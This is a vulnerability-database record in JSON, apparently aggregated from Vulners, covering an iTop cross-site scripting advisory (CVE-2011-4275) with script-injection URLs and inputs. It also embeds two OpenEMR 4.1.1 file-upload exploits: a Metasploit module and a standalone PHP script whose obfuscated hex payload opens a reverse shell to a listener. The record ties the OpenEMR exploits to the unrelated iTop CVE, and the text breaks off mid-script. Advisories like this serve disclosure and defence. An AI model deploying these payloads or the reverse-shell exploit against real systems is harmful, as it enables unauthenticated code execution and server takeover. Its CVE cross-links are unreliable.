ID SECURITYVULNS:VULN:12054
Type securityvulns
Reporter
Modified 2011-11-27T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:12054", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2011-11-27T00:00:00", "modified": "2011-11-27T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12054", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27350", "https://vulners.com/securityvulns/securityvulns:doc:27355", "https://vulners.com/securityvulns/securityvulns:doc:27358", "https://vulners.com/securityvulns/securityvulns:doc:27349", "https://vulners.com/securityvulns/securityvulns:doc:27353", "https://vulners.com/securityvulns/securityvulns:doc:27359", "https://vulners.com/securityvulns/securityvulns:doc:27364", "https://vulners.com/securityvulns/securityvulns:doc:27356", "https://vulners.com/securityvulns/securityvulns:doc:27362", "https://vulners.com/securityvulns/securityvulns:doc:27363", "https://vulners.com/securityvulns/securityvulns:doc:27365", "https://vulners.com/securityvulns/securityvulns:doc:27351", "https://vulners.com/securityvulns/securityvulns:doc:27357", "https://vulners.com/securityvulns/securityvulns:doc:27354", "https://vulners.com/securityvulns/securityvulns:doc:27368", "https://vulners.com/securityvulns/securityvulns:doc:27370", "https://vulners.com/securityvulns/securityvulns:doc:27361", "https://vulners.com/securityvulns/securityvulns:doc:27367", "https://vulners.com/securityvulns/securityvulns:doc:27352", "https://vulners.com/securityvulns/securityvulns:doc:27366", "https://vulners.com/securityvulns/securityvulns:doc:27369"], "cvelist": ["CVE-2011-4275"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:45", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "83641d0c7b4db09e4371bbbd3c217837"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2fd0ec8aeab2fbc260f0a9e7ea7dc81d"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "eb723f2c2b2fdd80b49d7bde7f6706c0"}, {"key": "modified", "hash": "a5013292d59a3f9e71467dc3fbf2218b"}, {"key": "published", "hash": "a5013292d59a3f9e71467dc3fbf2218b"}, {"key": "references", "hash": "58d9265b6da239d05f35b10643d2ca56"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "483e4764bf9b10d2532d2ea67a8923751df493c5ae1416b41902bda524baded9", "viewCount": 3, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-08-31T11:09:45"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "affectedSoftware": [{"name": "TinyMCE", "operator": "eq", "version": "3.4"}, {"name": "meenews", "operator": "eq", "version": "5.1"}, {"name": "spip", "operator": "eq", "version": "2.1"}, {"name": "PmWiki", "operator": "eq", "version": "2.2"}, {"name": "Blogs manager", "operator": "eq", "version": "1.101"}, {"name": "WordPress", "operator": "eq", "version": "3.1"}, {"name": "CMS Balitbang", "operator": "eq", "version": "3.0"}, {"name": "RoundCube", "operator": "eq", "version": "0.6"}, {"name": "flvPlayer", "operator": "eq", "version": "1.0"}, {"name": "Freelancer calendar", "operator": "eq", "version": "1.01"}, {"name": "Support Incident Tracker", "operator": "eq", "version": "3.65"}, {"name": "Valid tiny-erp", "operator": "eq", "version": "1.6"}, {"name": "iTop", "operator": "eq", "version": "1.1"}, {"name": "Dolibarr", "operator": "eq", "version": "3.1"}, {"name": "WordPress", "operator": "eq", "version": "2.6"}]}
{"cve": [{"lastseen": "2018-10-10T11:34:14", "references": ["http://www.securityfocus.com/archive/1/520632/100/0/threaded", "http://www.securityfocus.com/archive/1/520632", "http://www.tele-consulting.com/advisories/TC-SA-2011-02.txt"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.", "edition": 2, "reporter": "NVD", "published": "2011-11-25T22:57:45", "title": "CVE-2011-4275", "type": "cve", "enchantments": {"score": {"modified": "2018-10-10T11:34:14", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-4275"], "scanner": [], "modified": "2018-10-09T15:33:28", "cpe": ["cpe:/a:combodo:itop:1.1.181", "cpe:/a:combodo:itop:1.2.0:rc282"], "id": "CVE-2011-4275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4275", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "references": [], "description": "TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181\r\n\r\nPublished: 2011/11/16\r\nVersion 1.0\r\n\r\nAffected products:\r\n iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)\r\n http://sourceforge.net/projects/itop/\r\n\r\nReferences: \r\n CVE-2011-4275 - Multiple web-vulnerabilities in iTop\r\n TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt\r\n(used for updates)\r\n \r\nSummary:\r\n "IT Operations Portal: a complete open source, ITIL, web based \r\n service management tool including a fully customizable CMDB, \r\n a helpdesk system and a document management tool."\r\n Several common flaws could be found in iTop like reflected\r\n and stored XSS.\r\n\r\n\r\nVulnerable Scripts:\r\n stored XSS:\r\n - almost every tested input field stored in database and in the\r\nhtml-content of the site. \r\n Especially in case data is reformatted using Javascript, the\r\nsanitisation in place \r\n seems to be overridden.\r\n\r\n reflected XSS:\r\n - almost every test input field where the value is reflected in\r\nservers output\r\n\r\nExamples:\r\n stored XSS:\r\n - add a company named "XSS <script>alert("Help Me")</script>"\r\n - add a database server named "XSS <script>alert("Help\r\nMe")</script>"\r\n - import a CSV-File where one cell contains "XSS <script>alert("Help\r\nMe")</script>"\r\n - copy&paste data (which does the same as CSV-import) using\r\n 1;Test 1\r\n 2;Test 2\r\n 3;Test 3<script>alert("23746234243 Test")</script>"\r\n\r\n reflected XSS (un-authenticated):\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help\r\nMe")</script><lala="&suggest_pwd=admin\r\n\r\n reflected XSS (authenticated):\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help\r\nMe")</script><lala="&suggest_pwd=admin\r\n \r\nhttp://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help\r\nMe")</script>"\r\n \r\nhttp://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc\r\nhFormToAdd_document_list \\r\n &description="<script>alert("Help\r\nMe")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \\r\n _form&org_id=3&status=draft&type=contract\r\n \r\nhttp://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C\r\n/script%3E%22&operation=errors&rule=1\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894\r\n9560%29%20bad%3d%22&suggest_pwd=test\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse\r\nover%3dprompt%28972137%29%20bad%3d%22\r\n\r\nPossible solutions:\r\n - use version 1.2 final\r\n\r\nDisclosure Timeline:\r\n 2011/08/09 vendor contacted via contact@combodo.com\r\n 2011/08/09 inital vendor response\r\n 2011/09/06 first patch by the vendor\r\n 2011/09/12 second patch by the vendor\r\n 2011/11/16 public disclosure\r\n\r\nCredits:\r\n Tobias Glemser (tglemser@tele-consulting.com)\r\n Tele-Consulting security networking training GmbH, Germany\r\n www.tele-consulting.com\r\n \r\nDisclaimer:\r\n All information is provided without warranty. The intent is to \r\n provide information to secure infrastructure and/or systems, not\r\n to be able to attack or damage. Therefore Tele-Consulting shall \r\n not be liable for any direct or indirect damages that might be \r\n caused by using this information.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-11-27T00:00:00", "title": "TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:42", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-4275"], "modified": "2011-11-27T00:00:00", "id": "SECURITYVULNS:DOC:27354", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27354", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:30", "references": [], "edition": 1, "description": "", "reporter": "Tobias Glemser", "published": "2011-11-23T00:00:00", "type": "packetstorm", "title": "iTop 1.1.181 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4275"], "modified": "2011-11-23T00:00:00", "href": "https://packetstormsecurity.com/files/107245/iTop-1.1.181-Cross-Site-Scripting.html", "id": "PACKETSTORM:107245", "sourceData": "`TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 \n \nPublished: 2011/11/16 \nVersion 1.0 \n \nAffected products: \niTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well) \nhttp://sourceforge.net/projects/itop/ \n \nReferences: \nCVE-2011-4275 - Multiple web-vulnerabilities in iTop \nTC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt \n(used for updates) \n \nSummary: \n\"IT Operations Portal: a complete open source, ITIL, web based \nservice management tool including a fully customizable CMDB, \na helpdesk system and a document management tool.\" \nSeveral common flaws could be found in iTop like reflected \nand stored XSS. \n \n \nVulnerable Scripts: \nstored XSS: \n- almost every tested input field stored in database and in the \nhtml-content of the site. \nEspecially in case data is reformatted using Javascript, the \nsanitisation in place \nseems to be overridden. \n \nreflected XSS: \n- almost every test input field where the value is reflected in \nservers output \n \nExamples: \nstored XSS: \n- add a company named \"XSS <script>alert(\"Help Me\")</script>\" \n- add a database server named \"XSS <script>alert(\"Help \nMe\")</script>\" \n- import a CSV-File where one cell contains \"XSS <script>alert(\"Help \nMe\")</script>\" \n- copy&paste data (which does the same as CSV-import) using \n1;Test 1 \n2;Test 2 \n3;Test 3<script>alert(\"23746234243 Test\")</script>\" \n \nreflected XSS (un-authenticated): \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin\"><script>alert(\"Help \nMe\")</script><lala=\"&suggest_pwd=admin \n \nreflected XSS (authenticated): \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin\"><script>alert(\"Help \nMe\")</script><lala=\"&suggest_pwd=admin \n \nhttp://$domain/iTop/pages/UniversalSearch.php?c[menu]=\"<script>alert(\"Help \nMe\")</script>\" \n \nhttp://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note¤tId=Searc \nhFormToAdd_document_list \\ \n&description=\"<script>alert(\"Help \nMe\")</script>\"&dosearch=1&name=Acunetix&open=1&operation=search \\ \n_form&org_id=3&status=draft&type=contract \n \nhttp://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C \n/script%3E%22&operation=errors&rule=1 \n \nhttp://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894 \n9560%29%20bad%3d%22&suggest_pwd=test \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse \nover%3dprompt%28972137%29%20bad%3d%22 \n \nPossible solutions: \n- use version 1.2 final \n \nDisclosure Timeline: \n2011/08/09 vendor contacted via contact@combodo.com \n2011/08/09 inital vendor response \n2011/09/06 first patch by the vendor \n2011/09/12 second patch by the vendor \n2011/11/16 public disclosure \n \nCredits: \nTobias Glemser (tglemser@tele-consulting.com) \nTele-Consulting security networking training GmbH, Germany \nwww.tele-consulting.com \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide information to secure infrastructure and/or systems, not \nto be able to attack or damage. Therefore Tele-Consulting shall \nnot be liable for any direct or indirect damages that might be \ncaused by using this information. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/107245/TC-SA-2011-02.txt"}], "exploitdb": [{"lastseen": "2016-02-02T23:28:51", "osvdbidlist": ["90222", "59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "OpenEMR PHP File Upload Vulnerability. CVE-2009-4140,CVE-2011-4275. Remote exploit for php platform", "reporter": "metasploit", "published": "2013-02-20T00:00:00", "type": "exploitdb", "title": "OpenEMR PHP File Upload Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-02-20T00:00:00", "id": "EDB-ID:24529", "href": "https://www.exploit-db.com/exploits/24529/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::FileDropper\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"OpenEMR PHP File Upload Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the\r\n\t\t\t\tofc_upload_image.php file from the openflashchart library, a malicious user can\r\n\t\t\t\tupload a file to the tmp-upload-images directory without any authentication, which\r\n\t\t\t\tresults in arbitrary code execution. The module has been tested successfully on\r\n\t\t\t\tOpenEMR 4.1.1 over Ubuntu 10.04.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '90222' ],\r\n\t\t\t\t\t[ 'BID', '37314' ],\r\n\t\t\t\t\t[ 'EBD', '24492' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OpenEMR 4.1.1', {}]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 13 2013\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\r\n\t\t# Check version\r\n\t\tprint_status(\"#{peer} - Trying to detect installed version\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(uri, \"interface\", \"login\", \"login.php\")\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /v(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{peer} - Version #{version} detected\")\r\n\r\n\t\tif version > \"4.1.1\"\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# Check for vulnerable component\r\n\t\tprint_status(\"#{peer} - Trying to detect the vulnerable component\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"php-ofc-library\", \"ofc_upload_image.php\"),\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /Saving your image to/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tpayload_name = rand_text_alpha(rand(10) + 5) + '.php'\r\n\t\tmy_payload = payload.encoded\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n\t\tres = send_request_raw({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"php-ofc-library\", \"ofc_upload_image.php\") + \"?name=#{payload_name}\",\r\n\t\t\t'headers' => { \"Content-Length\" => my_payload.length.to_s },\r\n\t\t\t'data' => my_payload\r\n\t\t})\r\n\r\n\t\t# If the server returns 200 and the body contains our payload name,\r\n\t\t# we assume we uploaded the malicious file successfully\r\n\t\tif not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/\r\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, aborting!\")\r\n\t\tend\r\n\r\n\t\tregister_file_for_cleanup(payload_name)\r\n\r\n\t\tprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n\t\t# Execute our payload\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"tmp-upload-images\", payload_name),\r\n\t\t})\r\n\r\n\t\t# If we don't get a 200 when we request our malicious payload, we suspect\r\n\t\t# we don't have a shell, either. Print the status code for debugging purposes.\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_error(\"#{peer} - Server returned #{res.code.to_s}\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24529/"}, {"lastseen": "2016-02-02T23:24:34", "osvdbidlist": ["90222", "59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "reporter": "LiquidWorm", "published": "2013-02-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 4.1.1 ofc_upload_image.php Arbitrary File Upload Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-02-13T00:00:00", "id": "EDB-ID:24492", "href": "https://www.exploit-db.com/exploits/24492/", "sourceData": "<?php\r\n\r\n/*\r\n\r\nOpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability\r\n\r\n\r\nVendor: OpenEMR\r\nProduct web page: http://www.open-emr.org\r\nAffected version: 4.1.1\r\n\r\nSummary: OpenEMR is a Free and Open Source electronic health records and medical\r\npractice management application that can run on Windows, Linux, Mac OS X, and many\r\nother platforms.\r\n\r\nDesc: The vulnerability is caused due to the improper verification of uploaded\r\nfiles in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script\r\nthru the 'name' parameter. This can be exploited to execute arbitrary PHP code\r\nby uploading a malicious PHP script with multiple extensions.\r\n\r\n================================================================================\r\n/library/openflashchart/php-ofc-library/ofc_upload_image.php:\r\n-------------------------------------------------------------\r\n\r\n21: $default_path = '../tmp-upload-images/';\r\n23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);\r\n26: $destination = $default_path . basename( $_GET[ 'name' ] );\r\n28: echo 'Saving your image to: '. $destination;\r\n39: $jfh = fopen($destination, 'w') or die(\"can't open file\");\r\n40: fwrite($jfh, $HTTP_RAW_POST_DATA);\r\n41: fclose($jfh);\r\n46: exit();\r\n\r\n================================================================================\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Fedora Linux\r\n Apache2, PHP 5.4 MySQL 5.5\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5126\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php\r\n\r\n\r\n09.02.2013\r\n\r\n*/\r\n\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\n$go = \"\\033[0;92m\"; $no = \"\\033[0;37m\";\r\necho $no;\r\n\r\n$host = $argv[1];\r\n\r\n$sock = fsockopen($host, 80, $errno, $errstr, 30);\r\n\r\nif(!$sock)\r\n{\r\n echo \"\\n> $errstr ($errno)\\n\";\r\n die();\r\n}\r\n\r\nfunction r_shell($sc)\r\n{\r\n for($z = 0; $z < strlen($sc); $z += 2)\r\n $exec .= chr(hexdec(substr($sc,$z,2)));\r\n return $exec;\r\n}\r\n\r\nprint \"\\n+--------------------------------------------------------+\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ ID: ZSL-2013-5126 +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ Copyleft (c) 2013, Zero Science Lab +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+--------------------------------------------------------+\\n\\n\";\r\n\r\n// PoC for Linux\r\n// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234\r\n\r\nif ($argc < 2)\r\n{\r\n print \"\\n> Usage: php $argv[0] <target>\\n\\n\";\r\n die();\r\n}\r\n\r\n\r\n$pl = r_shell(\"3c3f7068700d0a\". \"7365745f74696d\". \"655f6c696d6974\".\r\n \"202830293b0d0a\". \"246970203d2027\". \"3132372e302e30\".\r\n \"2e31273b0d0a24\". \"706f7274203d20\". \"313233343b0d0a\".\r\n \"246368756e6b5f\". \"73697a65203d20\". \"313430303b0d0a\".\r\n \"2477726974655f\". \"61203d206e756c\". \"6c3b2024657272\".\r\n \"6f725f61203d20\". \"6e756c6c3b0d0a\". \"247368656c6c20\".\r\n \"3d2027756e616d\". \"65202d613b2077\". \"3b2069643b202f\".\r\n \"62696e2f736820\". \"2d69273b0d0a24\".\r\n \"6461656d6f6e20\". \"3d20303b202464\".\r\n \"65627567203d20\". \"303b0d0a696620\".\r\n \"2866756e637469\". \"6f6e5f65786973\".\r\n \"7473282770636e\". \"746c5f666f726b\".\r\n \"272929207b0d0a\". \"24706964203d20\".\r\n \"70636e746c5f66\". \"6f726b28293b0d\".\r\n \"0a696620282470\". \"6964203d3d202d\". \"3129207b0d0a70\".\r\n \"72696e74697428\". \"224552524f523a\". \"2043616e277420\".\r\n \"666f726b22293b\". \"20657869742831\". \"293b7d0d0a6966\".\r\n \"20282470696429\". \"207b6578697428\". \"30293b7d0d0a69\".\r\n \"662028706f7369\". \"785f7365747369\". \"642829203d3d20\".\r\n \"2d3129207b0d0a\". \"7072696e746974\". \"28224572726f72\".\r\n \"3a2043616e2774\". \"20736574736964\". \"282922293b2065\".\r\n \"7869742831293b\". \"7d0d0a24646165\".\r\n \"6d6f6e203d2031\". \"3b7d20656c7365\".\r\n \"207b0d0a707269\". \"6e746974282257\".\r\n \"41524e494e473a\". \"204661696c6564\".\r\n \"20746f20646165\". \"6d6f6e6973652e\".\r\n \"20205468697320\". \"69732071756974\".\r\n \"6520636f6d6d6f\". \"6e20616e64206e\".\r\n \"6f742066617461\". \"6c2e22293b7d0d\". \"0a636864697228\".\r\n \"222f22293b2075\". \"6d61736b283029\". \"3b0d0a24736f63\".\r\n \"6b203d2066736f\". \"636b6f70656e28\". \"2469702c202470\".\r\n \"6f72742c202465\". \"72726e6f2c2024\". \"6572727374722c\".\r\n \"203330293b0d0a\". \"69662028212473\". \"6f636b29207b0d\".\r\n \"0a7072696e7469\". \"74282224657272\". \"73747220282465\".\r\n \"72726e6f292229\". \"3b206578697428\". \"31293b7d0d0a24\".\r\n\r\n \"64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270\".\r\n \"697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d\".\r\n \"0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d\".\r\n \"2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470\".\r\n \"69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d\".\r\n \"0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d\".\r\n \"0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573\".\r\n \"5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31\".\r\n \"5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c\".\r\n \"2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a\".\r\n \"7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073\".\r\n \"68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620\".\r\n \"2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c\".\r\n \"20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620\".\r\n \"2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053\".\r\n \"68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472\".\r\n \"6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573\".\r\n \"5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73\".\r\n \"656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c\".\r\n \"6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a\".\r\n \"6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e\".\r\n \"707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028\".\r\n \"24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269\".\r\n \"7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928\".\r\n \"2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072\".\r\n \"696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428\".\r\n \"2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920\".\r\n \"7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f\".\r\n \"636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c\".\r\n \"2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444\".\r\n \"455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c\".\r\n \"20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253\".\r\n \"54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574\".\r\n \"293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d\".\r\n \"293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b\".\r\n \"325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20\".\r\n \"7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070\".\r\n \"72696e74202224737472696e675c6e223b7d7d0d0a3f3e\"); //PHP Reverse Shell, PTMNKY.\r\n\r\n\r\necho \"\\n> Writing reverse shell file\";\r\n\r\n$pckt = \"POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\\r\\n\";\r\n$pckt .= \"Host: {$host}\\r\\n\";\r\n$pckt .= \"Content-Length: \".strlen($pl).\"\\r\\n\\r\\n{$pl}\";\r\n\r\nfputs($sock, $pckt);\r\n\r\nsleep (2);\r\nprint \" ....\"; echo $go.\"[OK]\"; echo $no;\r\n\r\necho \"\\n> Calling your listener\";\r\n\r\n$pckt = \"GET 